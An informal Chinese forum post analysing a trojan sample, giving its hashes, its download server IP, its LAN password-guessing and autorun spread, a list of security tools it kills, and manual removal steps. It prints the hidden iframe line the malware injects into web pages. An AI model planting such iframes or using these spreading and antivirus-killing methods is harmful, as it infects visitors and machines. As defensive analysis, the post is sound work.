从百度博客转过来````
前几天的了````
样本来至动物园病毒样本区```
据说是新浪网站被挂的马,还不赖,无聊之余,粗略跟踪`````
Aditional Information
File size: 53208 bytes
MD5: 7e73f2df45e2d6a450273801436b703c
SHA1: eb5148fbed8fce2d22c92bb80191fcafa1dfe975
packers: Upack
packers: UPACK
packers: UPack
CRC32 : FA0D38F7
RIPEMD160: 08ADF68600A468A6D806F361A4AB7681F3887A06
编写语言:Borland Delphi 6.0 - 7.0
======================================
病毒行为:
(前天分析的了``由于没时间整理```,具体情节忘记咯``以下跟踪不一定全):
运行后,病毒主体驻进程,开双线程,访问局域,另一个线程则连接外部下载病毒````
试图访问192.168.0.1-192.168.0.30,另一个线程则连接218.16.117.84(TCP)下载木马`````
尝试建立IPC$空连接(基于内网),用帐号Guest和Administrator带弱密码猜口令````并开启admin$连接````
生成Autorun.inf和autorun.exe,得于双击分区激活病毒```但在跟踪时只在C盘和D盘下生成```貌似不遍历```
驻进程的病毒,尝试关闭:
PasswordGuard.exe
RavMon.exe
RavMonClass天网防火墙个人版
天网防火墙个人版
Tapplication
天网防火墙企业版
Tapplication
噬菌体
ZoneAlarm
EGHOST.EXE
KAVPFW.EXE
KWatchUI.EXE
等等```疑为国人所写```
而后搜索全盘``查找扩展名为.htm\.html\.asp\.php\.asa等文件`````
插入代码:iframe src=http://www.wg581.com height=0></iframe>
另一线程下载一大推乱七八糟的木马(在C盘跟目录)后释放DLL木马插进程并加入注册表RUN启动项,后经跟踪判断为盗网游"完美世界"木马```(还有个小木马注册一个系统服务,为:WinWMServiceNow)
=====================================
其他的不记得了````解决方法:
下载工具:SREng、PowerRMV
[url]http://free.ys168.com/?gudugengkekao[/url]这里有提供```下载后直接放桌面``断开网络```
先打开PowerRMV ,填入:(找不到则忽略,一次一个```)
C:\autorun.inf C:\autorun.exe
D:\autorun.inf D:\autorun.exe
E:\autorun.inf E:\autorun.exe
F:\autorun.inf F:\autorun.exe
C:\winnt\system32\ctfnom.exe
C:\WINNT\system32\drivers\usbine.sys
打开任务管理器,结束Winun.exe进程```
按F3查找RAVWM.EXE和RAVWM515.dll,找的话则删除```````
我的电脑-系统盘(C盘?)-属性-磁盘清理-全部勾选上-点确定即可```
运行SREng,删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<twin><C:\winnt\system32\ctfnom.exe> [Microsoft Corporation]
[WinWMServiceNow / WinWMServiceNow][Stopped/Auto Start]
<C:\DOCUME~1\admin\LOCALS~1\Temp\RAVWM.EXE><N/A>
打开任务管理器,有看到类似upxsdnd.exe进程的则关闭,并删除````
然后升级杀软,全盘扫描````
由于测试时候出了点问题(HIPS设置的规则忘记还原了``)```使得该病毒没有“完全发挥水平”
如果有遗漏的话``那么很抱歉`````请原谅我````
此主题相关图片如下: